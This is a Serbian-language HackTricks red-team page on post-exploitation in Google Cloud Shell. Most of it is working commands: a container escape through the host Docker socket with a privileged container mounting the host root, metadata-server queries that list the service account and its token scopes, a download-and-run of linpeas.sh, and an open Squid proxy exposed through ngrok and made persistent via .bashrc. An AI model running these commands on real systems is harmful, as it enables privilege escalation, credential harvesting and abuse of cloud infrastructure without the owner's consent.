GCP - Cloud Shell Post Exploitation

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

Cloud Shell

Za više informacija o Cloud Shell-u proverite:

GCP - Cloud Shell Enum

Bekstvo iz kontejnera

Imajte na umu da Google Cloud Shell radi unutar kontejnera, možete lako pobeći na host tako što ćete uraditi:

sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh

Ovo se ne smatra ranjivošću od strane Google-a, ali vam pruža širi uvid u ono što se dešava u tom okruženju.

Takođe, primetite da sa hosta možete pronaći token za servisni nalog:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/

Sa sledećim opsegom:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write

Nabrajajte metapodatke pomoću LinPEAS-a:

cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud

Nakon korišćenja https://github.com/carlospolop/bf_my_gcp_permissions sa tokenom Servisnog naloga nije otkrivena nikakva dozvola...

Koristite ga kao Proxy

Ako želite da koristite svoju Google Cloud Shell instancu kao proxy, morate pokrenuti sledeće komande (ili ih ubaciti u .bashrc datoteku):

sudo apt install -y squid

Samo da znate, Squid je HTTP proxy server. Kreirajte squid.conf datoteku sa sledećim podešavanjima:

http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0.0.0/0
http_access allow all

kopirajte datoteku squid.conf u /etc/squid

sudo cp squid.conf /etc/squid

Konačno pokrenite squid servis:

sudo service squid start

Koristite ngrok da biste omogućili da proxy bude dostupan spolja:

./ngrok tcp 3128

Nakon pokretanja, kopirajte tcp:// URL. Ako želite pokrenuti proxy iz preglednika, predlaže se da uklonite dio tcp:// i port, a port stavite u polje porta postavki proxyja u pregledniku (squid je http proxy server).

Za bolje korišćenje pri pokretanju, .bashrc datoteka treba da sadrži sledeće linije:

sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok;./ngrok tcp 3128

Uputstva su kopirana sa https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Proverite tu stranicu za druge lude ideje kako pokrenuti bilo kakav softver (baze podataka čak i Windows) u Cloud Shell-u.

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

Last updated